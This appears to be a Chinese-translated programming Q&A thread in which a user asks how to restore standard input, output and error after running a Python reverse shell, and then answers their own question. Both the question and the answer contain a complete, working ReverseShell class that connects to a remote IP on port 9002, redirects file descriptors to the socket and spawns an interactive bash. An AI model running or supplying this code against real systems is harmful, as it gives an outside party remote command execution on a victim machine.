Jam*_*inB 4 python sockets stdin stdout stderr
我有以下代码,它将反向 shell 发送到远程侦听端口。它通过使用 os.dup2() 函数调用将标准 out/in/err 重定向到套接字文件描述符来实现此目的。根据Python文档,os.dup2()函数将销毁旧的文件描述符并将其重定向到新的文件描述符。因为我想最终重定向回正常的标准输出/输入/错误,所以我复制了描述符。在 /bin/bash shell 被终止并且套接字关闭后,调用此类的主循环将继续,但标准 out/in/err 不会被重定向。我如何才能成功重定向回正常,IE如何使该程序末尾的打印语句显示文本?
class ReverseShell:
def __init__(self, ip, port=9002):
self.ip = ip
self.port = port
def start(self):
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
#Save previous standard std and descriptors
prevOutFd = os.dup(sys.stdout.fileno())
prevOut = sys.stdout
prevInFd = os.dup(sys.stdin.fileno())
prevIn = sys.stdin
prevErrFd = os.dup(sys.stderr.fileno())
prevErr = sys.stderr
#Open socket
sock.connect((self.ip,self.port))
#Redirect standard in, out, and error
os.dup2(sock.fileno(),0)
os.dup2(sock.fileno(),1)
os.dup2(sock.fileno(),2)
#Pass the shell
subprocess.call(["/bin/bash","-i"])
#Kill the socket
sock.shutdown(socket.SHUT_RDWR)
sock.close()
#Restore standard in, out, and error
os.dup2(prevOutFd, prevOut)
sys.stdout = prevOut
os.dup2(prevInFd, prevIn)
sys.stdin = prevIn
os.dup2(prevErrFd, prevErr)
sys.stderr = prevErr
print "This should print but it does not"
经过多次浏览,我终于找到了一个可行的解决方案。
class ReverseShell:
def __init__(self, ip, port=9002):
self.ip = ip
self.port = port
def start(self):
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
#Save previous standard std and descriptors
prevOutFd = os.dup(1)
prevInFd = os.dup(0)
prevErrFd = os.dup(2)
#Open socket
sock.connect((self.ip,self.port))
#Redirect standard in, out, and error
os.dup2(sock.fileno(),0)
os.dup2(sock.fileno(),1)
os.dup2(sock.fileno(),2)
#Pass the shell
subprocess.call(["/bin/bash","-i"])
#Kill the socket
sock.shutdown(socket.SHUT_RDWR)
sock.close()
#Restore standard in, out, and error
os.dup2(prevOutFd, 1)
os.close(prevOutFd)
os.dup2(prevInFd, 0)
os.close(prevInFd)
os.dup2(prevErrFd,2)
os.close(prevErrFd)
| 归档时间: |
|
| 查看次数: |
3005 次 |
| 最近记录: |